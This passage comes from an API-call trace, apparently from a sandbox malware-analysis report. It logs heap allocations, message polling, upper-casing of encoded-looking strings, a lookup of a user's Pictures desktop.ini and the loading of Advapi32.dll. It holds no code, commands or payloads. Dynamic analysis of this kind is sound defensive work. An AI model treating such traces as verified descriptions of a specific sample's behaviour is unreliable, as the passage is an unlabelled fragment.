wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0254.703] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0254.703] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.703] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.703] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.703] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.703] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.704] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/desktop.ini", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa760047, dwReserved1=0x1cc28, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5760 [0254.704] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0254.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.705] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0254.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0254.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.706] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.706] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0254.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.707] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.707] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.708] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.708] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.708] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.708] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.709] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.709] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.709] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.711] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.712] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0254.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.713] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.713] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.713] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0254.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.714] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0254.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0254.714] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0254.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0254.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.715] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 